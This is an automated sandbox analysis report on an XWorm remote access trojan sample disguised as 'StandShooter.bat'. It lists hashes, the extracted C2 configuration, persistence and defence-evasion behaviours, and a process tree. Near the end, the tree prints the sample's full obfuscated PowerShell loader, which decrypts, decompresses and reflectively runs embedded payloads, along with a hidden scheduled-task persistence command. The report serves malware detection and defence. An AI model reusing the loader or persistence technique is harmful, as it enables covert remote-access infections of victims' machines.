xworm | dc4ad7f04bd7f277494092d4db0c337b1b4bbe5d0bc8a667babf5f3045144416

Analysis

max time kernel
90s
max time network
90s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
01/06/2024, 02:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

StandShooter.bat
Size

511KB
MD5

537886f4e49111f326e5d90e4c38c7d1
SHA1

57b09c800cba244e68d317a0960f041aee468360
SHA256

dc4ad7f04bd7f277494092d4db0c337b1b4bbe5d0bc8a667babf5f3045144416
SHA512

0deb228bf17e218fdf7f98f49f89c1f25ee059c95887a697afbe64acbf3411f022eb80ee5349e8e44658511609e0c585aa501cb645439bc97088ba169f7c8107
SSDEEP

12288:ZUxYtgKHokLaJ7vOYOXba/SQUfnQmD+D7Mep3O44:ZUxxBy8vuXhsmDfse44

Score

10^/10

xworm execution persistence rat trojan

Malware Config

Extracted

Family

xworm

127.0.0.1:57023

Name1442-57023.portmap.host:57023

Attributes

Install_directory
%Temp%
install_file
Stand.exe

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000200000002aa29-147.dat	family_xworm
behavioral1/memory/4764-155-0x0000000000130000-0x0000000000150000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1028	powershell.exe
2196	powershell.exe
3296	powershell.exe
2872	powershell.exe
1548	powershell.exe
1044	powershell.exe
876	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stand.lnk	Stand.Launchpad.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stand.lnk	Stand.Launchpad.exe

Executes dropped EXE 2 IoCs

pid	Process
4764	Stand.Launchpad.exe
4500	Stand.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Microsoft\Windows\CurrentVersion\Run\Stand = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Stand.exe"	Stand.Launchpad.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\Stand	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
232	schtasks.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
500	bitsadmin.exe

Modifies data under HKEY_USERS 49 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe

Modifies registry class 10 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1\LU	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1\LU\PCT = "133616821810434133"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1\LU\PTT = "133616822420475821"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1	svchost.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4764	Stand.Launchpad.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1044	powershell.exe
1044	powershell.exe
876	powershell.exe
876	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
2196	powershell.exe
2196	powershell.exe
3296	powershell.exe
3296	powershell.exe
2872	powershell.exe
2872	powershell.exe
1028	powershell.exe
1028	powershell.exe
4764	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe
1864	Stand.Launchpad.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3276	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1044	powershell.exe
Token: SeDebugPrivilege	876	powershell.exe
Token: SeIncreaseQuotaPrivilege	876	powershell.exe
Token: SeSecurityPrivilege	876	powershell.exe
Token: SeTakeOwnershipPrivilege	876	powershell.exe
Token: SeLoadDriverPrivilege	876	powershell.exe
Token: SeSystemProfilePrivilege	876	powershell.exe
Token: SeSystemtimePrivilege	876	powershell.exe
Token: SeProfSingleProcessPrivilege	876	powershell.exe
Token: SeIncBasePriorityPrivilege	876	powershell.exe
Token: SeCreatePagefilePrivilege	876	powershell.exe
Token: SeBackupPrivilege	876	powershell.exe
Token: SeRestorePrivilege	876	powershell.exe
Token: SeShutdownPrivilege	876	powershell.exe
Token: SeDebugPrivilege	876	powershell.exe
Token: SeSystemEnvironmentPrivilege	876	powershell.exe
Token: SeRemoteShutdownPrivilege	876	powershell.exe
Token: SeUndockPrivilege	876	powershell.exe
Token: SeManageVolumePrivilege	876	powershell.exe
Token: 33	876	powershell.exe
Token: 34	876	powershell.exe
Token: 35	876	powershell.exe
Token: 36	876	powershell.exe
Token: SeIncreaseQuotaPrivilege	876	powershell.exe
Token: SeSecurityPrivilege	876	powershell.exe
Token: SeTakeOwnershipPrivilege	876	powershell.exe
Token: SeLoadDriverPrivilege	876	powershell.exe
Token: SeSystemProfilePrivilege	876	powershell.exe
Token: SeSystemtimePrivilege	876	powershell.exe
Token: SeProfSingleProcessPrivilege	876	powershell.exe
Token: SeIncBasePriorityPrivilege	876	powershell.exe
Token: SeCreatePagefilePrivilege	876	powershell.exe
Token: SeBackupPrivilege	876	powershell.exe
Token: SeRestorePrivilege	876	powershell.exe
Token: SeShutdownPrivilege	876	powershell.exe
Token: SeDebugPrivilege	876	powershell.exe
Token: SeSystemEnvironmentPrivilege	876	powershell.exe
Token: SeRemoteShutdownPrivilege	876	powershell.exe
Token: SeUndockPrivilege	876	powershell.exe
Token: SeManageVolumePrivilege	876	powershell.exe
Token: 33	876	powershell.exe
Token: 34	876	powershell.exe
Token: 35	876	powershell.exe
Token: 36	876	powershell.exe
Token: SeIncreaseQuotaPrivilege	876	powershell.exe
Token: SeSecurityPrivilege	876	powershell.exe
Token: SeTakeOwnershipPrivilege	876	powershell.exe
Token: SeLoadDriverPrivilege	876	powershell.exe
Token: SeSystemProfilePrivilege	876	powershell.exe
Token: SeSystemtimePrivilege	876	powershell.exe
Token: SeProfSingleProcessPrivilege	876	powershell.exe
Token: SeIncBasePriorityPrivilege	876	powershell.exe
Token: SeCreatePagefilePrivilege	876	powershell.exe
Token: SeBackupPrivilege	876	powershell.exe
Token: SeRestorePrivilege	876	powershell.exe
Token: SeShutdownPrivilege	876	powershell.exe
Token: SeDebugPrivilege	876	powershell.exe
Token: SeSystemEnvironmentPrivilege	876	powershell.exe
Token: SeRemoteShutdownPrivilege	876	powershell.exe
Token: SeUndockPrivilege	876	powershell.exe
Token: SeManageVolumePrivilege	876	powershell.exe
Token: 33	876	powershell.exe
Token: 34	876	powershell.exe
Token: 35	876	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4764	Stand.Launchpad.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 404 wrote to memory of 4276	404	cmd.exe	82
PID 404 wrote to memory of 4276	404	cmd.exe	82
PID 404 wrote to memory of 1044	404	cmd.exe	83
PID 404 wrote to memory of 1044	404	cmd.exe	83
PID 1044 wrote to memory of 876	1044	powershell.exe	85
PID 1044 wrote to memory of 876	1044	powershell.exe	85
PID 1044 wrote to memory of 3100	1044	powershell.exe	88
PID 1044 wrote to memory of 3100	1044	powershell.exe	88
PID 3100 wrote to memory of 652	3100	WScript.exe	89
PID 3100 wrote to memory of 652	3100	WScript.exe	89
PID 652 wrote to memory of 2224	652	cmd.exe	91
PID 652 wrote to memory of 2224	652	cmd.exe	91
PID 652 wrote to memory of 1548	652	cmd.exe	92
PID 652 wrote to memory of 1548	652	cmd.exe	92
PID 1548 wrote to memory of 3276	1548	powershell.exe	53
PID 1548 wrote to memory of 2552	1548	powershell.exe	42
PID 1548 wrote to memory of 1760	1548	powershell.exe	30
PID 1548 wrote to memory of 1152	1548	powershell.exe	19
PID 1548 wrote to memory of 1856	1548	powershell.exe	31
PID 1548 wrote to memory of 1676	1548	powershell.exe	28
PID 1548 wrote to memory of 432	1548	powershell.exe	35
PID 1548 wrote to memory of 1732	1548	powershell.exe	29
PID 1548 wrote to memory of 1128	1548	powershell.exe	18
PID 1548 wrote to memory of 2308	1548	powershell.exe	40
PID 1548 wrote to memory of 1320	1548	powershell.exe	22
PID 1548 wrote to memory of 1120	1548	powershell.exe	17
PID 1548 wrote to memory of 1512	1548	powershell.exe	25
PID 1548 wrote to memory of 4264	1548	powershell.exe	73
PID 1548 wrote to memory of 716	1548	powershell.exe	15
PID 1548 wrote to memory of 1300	1548	powershell.exe	34
PID 1548 wrote to memory of 2236	1548	powershell.exe	38
PID 1548 wrote to memory of 2280	1548	powershell.exe	39
PID 1548 wrote to memory of 1488	1548	powershell.exe	24
PID 1548 wrote to memory of 3456	1548	powershell.exe	55
PID 1548 wrote to memory of 2856	1548	powershell.exe	68
PID 1548 wrote to memory of 2656	1548	powershell.exe	45
PID 1548 wrote to memory of 2064	1548	powershell.exe	36
PID 1548 wrote to memory of 2720	1548	powershell.exe	46
PID 1548 wrote to memory of 3432	1548	powershell.exe	54
PID 1548 wrote to memory of 1064	1548	powershell.exe	16
PID 1548 wrote to memory of 1000	1548	powershell.exe	12
PID 1548 wrote to memory of 1588	1548	powershell.exe	26
PID 1548 wrote to memory of 4012	1548	powershell.exe	60
PID 1548 wrote to memory of 1244	1548	powershell.exe	21
PID 1548 wrote to memory of 1440	1548	powershell.exe	66
PID 1548 wrote to memory of 4392	1548	powershell.exe	63
PID 1548 wrote to memory of 1236	1548	powershell.exe	20
PID 1548 wrote to memory of 2612	1548	powershell.exe	44
PID 1548 wrote to memory of 944	1548	powershell.exe	11
PID 1548 wrote to memory of 2804	1548	powershell.exe	50
PID 1548 wrote to memory of 832	1548	powershell.exe	10
PID 1548 wrote to memory of 1224	1548	powershell.exe	33
PID 1548 wrote to memory of 2600	1548	powershell.exe	43
PID 1548 wrote to memory of 2792	1548	powershell.exe	49
PID 1548 wrote to memory of 1408	1548	powershell.exe	23
PID 1548 wrote to memory of 2784	1548	powershell.exe	48
PID 1548 wrote to memory of 1596	1548	powershell.exe	27
PID 1548 wrote to memory of 1868	1548	powershell.exe	32
PID 1548 wrote to memory of 788	1548	powershell.exe	14
PID 1548 wrote to memory of 4736	1548	powershell.exe	70
PID 1548 wrote to memory of 3548	1548	powershell.exe	65
PID 1548 wrote to memory of 4764	1548	powershell.exe	93
PID 1548 wrote to memory of 4764	1548	powershell.exe	93
PID 1548 wrote to memory of 1056	1548	powershell.exe	94

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
1⤵
- Modifies registry class
PID:832

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
1⤵
PID:944

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:1000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:788

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:716

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1120

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1128

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1⤵
PID:1152

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1236

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1244
- C:\Users\Admin\AppData\Local\Temp\Stand.exe
  C:\Users\Admin\AppData\Local\Temp\Stand.exe
  2⤵
  - Executes dropped EXE
  PID:4500

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1408

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1488

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1512

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1588

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1596

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1760

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1856

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1868

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1224

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1300

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:432

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
1⤵
PID:2236

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2280

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2308

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2600

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2612

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
- Modifies data under HKEY_USERS
PID:2656

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2720

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2784

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2792

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2804

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\StandShooter.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNg4KoCSielf7qjlYXqAO7JKxI943sat8z2fd+W+bvE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pCU0X49GzoVy33W1yhXDAg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bRFqs=New-Object System.IO.MemoryStream(,$param_var); $HEgAc=New-Object System.IO.MemoryStream; $MSyPu=New-Object System.IO.Compression.GZipStream($bRFqs, [IO.Compression.CompressionMode]::Decompress); $MSyPu.CopyTo($HEgAc); $MSyPu.Dispose(); $bRFqs.Dispose(); $HEgAc.Dispose(); $HEgAc.ToArray();}function execute_function($param_var,$param2_var){ $DDEgm=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $fglmO=$DDEgm.EntryPoint; $fglmO.Invoke($null, $param2_var);}$fVuCm = 'C:\Users\Admin\AppData\Local\Temp\StandShooter.bat';$host.UI.RawUI.WindowTitle = $fVuCm;$EZbPl=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($fVuCm).Split([Environment]::NewLine);foreach ($MKKIe in $EZbPl) { if ($MKKIe.StartsWith('ZLMHHVVTjNWeBRfMcCXh')) { $saOcJ=$MKKIe.Substring(20); break; }}$payloads_var=[string[]]$saOcJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:4276
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1044
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_313_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_313.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:876
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_313.vbs"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3100
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_313.bat" "
        5⤵
